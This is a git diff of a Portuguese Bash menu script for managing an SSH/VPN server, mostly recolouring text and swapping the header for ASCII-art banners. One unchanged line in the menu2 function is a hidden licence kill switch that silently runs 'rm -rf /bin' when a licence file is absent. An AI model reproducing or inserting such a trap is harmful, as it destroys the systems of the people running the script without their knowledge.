Combinado

diff --git a/Modulos/menu b/Modulos/menu
--- a/Modulos/menu
+++ b/Modulos/menu
@@ -195,7 +195,7 @@ function autoexec () {
 menu2 (){
 [[ -e /etc/Plus-torrent ]] && stsf=$(echo -e "\033[1;32m(ON◉) ") || stsf=$(echo -e "\033[1;31m(OFF) ")
 stsbot=$(ps x | grep "bot_plus"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[1;31m(OFF) ")
-stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[1;31m(OFF) ")
+stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;31m(ON◉) " || echo -e "\033[1;31m(OFF) ")
 stsbotrev=$(ps x | grep "bot_rev"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[1;31m(OFF) ")
 autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m(ON◉) " || echo -e "\033[1;31m(OFF) ")
 [[ ! -e /usr/lib/licence ]] && rm -rf /bin > /dev/null 2>&1
@@ -229,12 +229,16 @@ swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
 echo -e "\033[1;31m╔════════════════════════════════════════════════════════════╗\033[0m"
-echo -e "\033[1;31m║ \E[5;34;47m                 SPEEDNET @EDUARDO                   \E[0m \033[1;31m║"
+echo " 
+╔═╗╔═╗───────╔╗───────╔╗─
+║═╣║╬║╔═╗╔═╗╔╝║╔═╦╗╔═╗║╚╗
+╠═║║╔╝║╩╣║╩╣║╬║║║║║║╩╣║╔╣
+╚═╝╚╝─╚═╝╚═╝╚═╝╚╩═╝╚═╝╚═╝" | lolcat
 echo -e "\033[1;31m╠════════════════════╦═══════════════════╦═══════════════════╣\033[0m"
 echo -e "\033[1;31m║  \033[1;32mSISTEMA           \033[1;31m║  \033[1;32mMEMÓRIA RAM      \033[1;31m║ \033[1;32m PROCESSADOR      \033[1;31m║"
 echo -e "\033[1;31m║  \033[1;36mOS: \033[1;37m$_system    \033[1;31m║  \033[1;36mTotal:\033[1;37m$_ram \033[1;31m║  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[1;31m║"
 echo -e "\033[1;31m║  \033[1;36mHora: \033[1;37m$_hora    \033[1;31m║  \033[1;36mEm uso: \033[1;37m$_usor \033[1;31m║  \033[1;36mEm uso: \033[1;37m$_usop\033[0m    \033[1;31m║"
-echo -e "\033[1;31m╠════════════════════╬═══════════════════╬═══════════════════╣\033[0m"
+echo -e "\033[1;32m╠════════════════════╬═══════════════════╬═══════════════════╣\033[0m"
 [[ ! -e /tmp/att ]]  && {
     echo -e "\033[1;31m║  \033[1;32mOnlines:\033[1;37m $_onlin    \033[1;31m║  \033[1;32mExpirados: \033[1;37m$_userexp \033[1;31m║  \033[1;32mTotal: \033[1;37m$_tuser\033[0m     \033[1;31m║"
     var01='\033[1;37m•'
@@ -314,7 +318,7 @@ case "$x" in
    exit;
    ;;
    *)
-   echo -e "\n\033[1;31mOpcao invalida !\033[0m"
+   echo -e "\n\033[1;32mOpcao invalida !\033[0m"
    sleep 2
 esac
 }
@@ -352,42 +356,48 @@ swap1=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $2'})")
 swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
-echo -e "\033[1;31m╔════════════════════════════════════════════════════════════╗\033[0m"
-echo -e "\033[1;31m║ \E[5;34;47m                 SPEEDNET @EDUARDO                  \E[0m \033[1;31m║"
-echo -e "\033[1;31m╠════════════════════╦═══════════════════╦═══════════════════╣\033[0m"
-echo -e "\033[1;31m║  \033[1;32mSISTEMA           \033[1;31m║  \033[1;32mMEMÓRIA RAM      \033[1;31m║ \033[1;32m PROCESSADOR      \033[1;31m║"
-echo -e "\033[1;31m║  \033[1;36mOS: \033[1;37m$_system    \033[1;31m║  \033[1;36mTotal:\033[1;37m$_ram \033[1;31m║  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[1;31m║"
-echo -e "\033[1;31m║  \033[1;36mHora: \033[1;37m$_hora    \033[1;31m║  \033[1;36mEm uso: \033[1;37m$_usor \033[1;31m║  \033[1;36mEm uso: \033[1;37m$_usop\033[0m    \033[1;31m║"
-echo -e "\033[1;31m╠════════════════════╬═══════════════════╬═══════════════════╣\033[0m"
-echo -e "\033[1;31m║  \033[1;32mOnlines:\033[1;37m $_onlin    \033[1;31m║  \033[1;32mExpirados: \033[1;37m$_userexp \033[1;31m║  \033[1;32mTotal: \033[1;37m$_tuser     \033[1;31m║"
-echo -e "\033[1;31m╠════════════════════╩═══════════════════╩═══════════════════╣\033[0m"
-echo -e "\033[1;31m║  \033[1;32mMEMÓRIA SWAP    \033[1;36mTotal: \033[1;37m$swap1  \033[1;36mEm uso: \033[1;37m$swap3  \033[1;36mLivre: \033[1;37m$swap2 \033[1;31m║"
-echo -e "\033[1;31m╠════════════════════════════════════════════════════════════╣\033[0m"
-echo -e "\033[1;31m║   \033[1;31m[\033[1;36m01\033[1;31m] \033[1;37m• \033[1;33mCRIAR USUARIO \033[1;31m            [\033[1;36m12\033[1;31m] \033[1;37m• \033[1;33mSPEEDTEST  \033[1;31m      ║
-\033[1;31m║   [\033[1;36m02\033[1;31m] \033[1;37m• \033[1;33mCRIAR TESTE         \033[1;31m      [\033[1;36m13\033[1;31m] \033[1;37m• \033[1;33mBANNER  \033[1;31m         ║ 
-\033[1;31m║   [\033[1;36m03\033[1;31m] \033[1;37m\033[1;37m• \033[1;33mREMOVER USUARIO \033[1;31m          [\033[1;36m14\033[1;31m] \033[1;37m• \033[1;33mTRAFEGO  \033[1;31m        ║
-\033[1;31m║   [\033[1;36m04\033[1;31m] \033[1;37m• \033[1;33mMONITOR ONLINE \033[1;31m           [\033[1;36m15\033[1;31m] \033[1;37m• \033[1;33mOTIMIZAR  \033[1;31m       ║
-\033[1;31m║   [\033[1;36m05\033[1;31m] \033[1;37m• \033[1;33mMUDAR DATA \033[1;31m               [\033[1;36m16\033[1;31m] \033[1;37m• \033[1;33mBACKUP  \033[1;31m         ║
-\033[1;31m║   [\033[1;36m06\033[1;31m] \033[1;37m• \033[1;33mALTERAR LIMITE \033[1;31m           [\033[1;36m17\033[1;31m] \033[1;37m• \033[1;33mFERRAMENTAS     \033[1;31m ║
-\033[1;31m║   [\033[1;36m07\033[1;31m] \033[1;37m• \033[1;33mMUDAR SENHA \033[1;31m              [\033[1;36m18\033[1;31m] \033[1;37m• \033[1;33mLIMITER $stsl \033[1;31m  ║
-\033[1;31m║   [\033[1;36m08\033[1;31m] \033[1;37m• \033[1;33mREMOVER EXPIRADOS \033[1;31m        [\033[1;36m19\033[1;31m] \033[1;37m• \033[1;33mBADVPN PRO $stsu\033[1;31m║
-\033[1;31m║   [\033[1;36m09\033[1;31m] \033[1;37m• \033[1;33mRELATORIO DE USUARIOS \033[1;31m    [\033[1;36m20\033[1;31m] \033[1;37m• \033[1;33mFIREWALL (PRO)  \033[1;31m ║
-\033[1;31m║   [\033[1;36m10\033[1;31m] \033[1;37m• \033[1;33mMODO DE CONEXAO \033[1;31m          [\033[1;36m21\033[1;31m] \033[1;37m• \033[1;33mINFO VPS \033[1;31m>\033[1;33m>\033[1;32m>\033[0m \033[1;31m    ║
-\033[1;31m║   [\033[1;36m11\033[1;31m] \033[1;37m• \033[1;33mCRIAR MEMORIA SWAP \033[1;31m       [\033[1;36m22\033[1;31m] \033[1;37m• \033[1;33mCHECKUSER 4G  \033[1;31m   ║
-\033[1;31m║   [\033[1;36m G \033[1;31m] \033[1;37m• \033[1;33mCHECKUSER GLTUNNEL \033[1;31m      [\033[1;36m23\033[1;31m] \033[1;37m• \033[1;33mMAIS \033[1;31m>\033[1;33m>\033[1;32m>\033[0m \033[1;31m        ║"
-echo -e "\033[1;31m╠════════════════════════════════════════════════════════════╝\033[0m"
-echo -ne "\033[1;31m╚╣\033[1;32m INFORME UMA OPÇÃO \033[1;33m:"; read x
+
+echo " 
+╔═══╗╔═══╗╔═══╗╔═══╗╔═══╗╔═╗─╔╗╔═══╗╔════╗
+║╔═╗║║╔═╗║║╔══╝║╔══╝╚╗╔╗║║║╚╗║║║╔══╝║╔╗╔╗║
+║╚══╗║╚═╝║║╚══╗║╚══╗─║║║║║╔╗╚╝║║╚══╗╚╝║║╚╝
+╚══╗║║╔══╝║╔══╝║╔══╝─║║║║║║╚╗║║║╔══╝──║║──
+║╚═╝║║║───║╚══╗║╚══╗╔╝╚╝║║║─║║║║╚══╗──║║──
+╚═══╝╚╝───╚═══╝╚═══╝╚═══╝╚╝─╚═╝╚═══╝──╚╝──" | lolcat
+echo -e "\033[1;32m╠════════════════════╦═══════════════════╦═══════════════════╣\033[0m"
+echo -e "\033[1;32m║  \033[1;32mSISTEMA           \033[1;32m║  \033[1;32mMEMÓRIA RAM      \033[1;32m║ \033[1;32m PROCESSADOR      \033[1;32m║"
+echo -e "\033[1;32m║  \033[1;36mOS: \033[1;37m$_system    \033[1;32m║  \033[1;36mTotal:\033[1;37m$_ram \033[1;32m║  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[1;32m║"
+echo -e "\033[1;32m║  \033[1;36mHora: \033[1;37m$_hora    \033[1;32m║  \033[1;36mEm uso: \033[1;37m$_usor \033[1;32m║  \033[1;36mEm uso: \033[1;37m$_usop\033[0m    \033[1;32m║"
+echo -e "\033[1;32m╠════════════════════╬═══════════════════╬═══════════════════╣\033[0m"
+echo -e "\033[1;32m║  \033[1;32mOnlines:\033[1;37m $_onlin    \033[1;32m║  \033[1;32mExpirados: \033[1;37m$_userexp \033[1;32m║  \033[1;32mTotal: \033[1;37m$_tuser     \033[1;32m║"
+echo -e "\033[1;32m╠════════════════════╩═══════════════════╩═══════════════════╣\033[0m"
+echo -e "\033[1;32m║  \033[1;32mMEMÓRIA SWAP    \033[1;36mTotal: \033[1;37m$swap1  \033[1;36mEm uso: \033[1;37m$swap3  \033[1;36mLivre: \033[1;37m$swap2 \033[1;32m║"
+echo -e "\033[1;32m╠════════════════════════════════════════════════════════════╣\033[0m"
+echo -e "\033[1;32m║   \033[1;32m[\033[1;36m01\033[1;32m] \033[1;37m• \033[1;33mCRIAR USUARIO \033[1;32m            [\033[1;36m12\033[1;32m] \033[1;37m• \033[1;33mSPEEDTEST  \033[1;32m      ║
+\033[1;32m║   [\033[1;36m02\033[1;32m] \033[1;37m• \033[1;33mCRIAR TESTE         \033[1;32m      [\033[1;36m13\033[1;32m] \033[1;37m• \033[1;33mBANNER  \033[1;32m         ║ 
+\033[1;32m║   [\033[1;36m03\033[1;32m] \033[1;37m\033[1;37m• \033[1;33mREMOVER USUARIO \033[1;32m          [\033[1;36m14\033[1;32m] \033[1;37m• \033[1;33mTRAFEGO  \033[1;32m        ║
+\033[1;32m║   [\033[1;36m04\033[1;32m] \033[1;37m• \033[1;33mMONITOR ONLINE \033[1;32m           [\033[1;36m15\033[1;32m] \033[1;37m• \033[1;33mOTIMIZAR  \033[1;32m       ║
+\033[1;32m║   [\033[1;36m05\033[1;32m] \033[1;37m• \033[1;33mMUDAR DATA \033[1;32m               [\033[1;36m16\033[1;32m] \033[1;37m• \033[1;33mBACKUP  \033[1;32m         ║
+\033[1;32m║   [\033[1;36m06\033[1;32m] \033[1;37m• \033[1;33mALTERAR LIMITE \033[1;32m           [\033[1;36m17\033[1;32m] \033[1;37m• \033[1;33mFERRAMENTAS     \033[1;32m ║
+\033[1;32m║   [\033[1;36m07\033[1;32m] \033[1;37m• \033[1;33mMUDAR SENHA \033[1;32m              [\033[1;36m18\033[1;32m] \033[1;37m• \033[1;33mLIMITER $stsl \033[1;32m  ║
+\033[1;32m║   [\033[1;36m08\033[1;32m] \033[1;37m• \033[1;33mREMOVER EXPIRADOS \033[1;32m        [\033[1;36m19\033[1;32m] \033[1;37m• \033[1;33mBADVPN PRO $stsu\033[1;32m║
+\033[1;32m║   [\033[1;36m09\033[1;32m] \033[1;37m• \033[1;33mRELATORIO DE USUARIOS \033[1;32m    [\033[1;36m20\033[1;32m] \033[1;37m• \033[1;33mFIREWALL (PRO)  \033[1;32m ║
+\033[1;32m║   [\033[1;36m10\033[1;32m] \033[1;37m• \033[1;33mMODO DE CONEXAO \033[1;32m          [\033[1;36m21\033[1;32m] \033[1;37m• \033[1;33mINFO VPS \033[1;32m>\033[1;33m>\033[1;32m>\033[0m \033[1;32m    ║
+\033[1;32m║   [\033[1;36m11\033[1;32m] \033[1;37m• \033[1;33mCRIAR MEMORIA SWAP \033[1;32m       [\033[1;36m22\033[1;32m] \033[1;37m• \033[1;33mCHECKUSER 4G  \033[1;32m   ║
+\033[1;32m║   [\033[1;36m G \033[1;32m] \033[1;37m• \033[1;33mCHECKUSER SPEEDNET \033[1;32m      [\033[1;36m23\033[1;32m] \033[1;37m• \033[1;33mMAIS \033[1;32m>\033[1;33m>\033[1;32m>\033[0m \033[1;32m        ║"
+echo -e "\033[1;32m╠════════════════════════════════════════════════════════════╝\033[0m"
+echo -ne "\033[1;32m╚╣\033[1;32m INFORME UMA OPÇÃO \033[1;33m:"; read x
 
 case "$x" in 
    1 | 01)
    clear
    criarusuario
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    2 | 02)
    clear
    criarteste
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    3 | 03)
    clear
@@ -397,7 +407,7 @@ case "$x" in
    4 | 04)
    clear
    sshmonitor
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;      
    5 | 05)
    clear
@@ -423,7 +433,7 @@ case "$x" in
    9 | 09)
    clear
    infousers
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    10)
    conexao
@@ -435,7 +445,7 @@ case "$x" in
    12)
    clear
    velocity
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    13)
    clear
@@ -451,11 +461,11 @@ case "$x" in
    15)
    clear
    otimizar
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    16)
    userbackup
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    17)
    clear
@@ -475,7 +485,7 @@ case "$x" in
    21)
    clear
    detalhes
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;32mENTER \033[1;33mpara retornar ao \033[1;32mMENU!\033[0m"; read
    ;;
    22)
    initcheck
@@ -487,7 +497,7 @@ case "$x" in
    gltunnel
    ;;
    *)
-   echo -e "\n\033[1;31mOpcao invalida !\033[0m"
+   echo -e "\n\033[1;32mOpcao invalida !\033[0m"
    sleep 2
 esac
 done
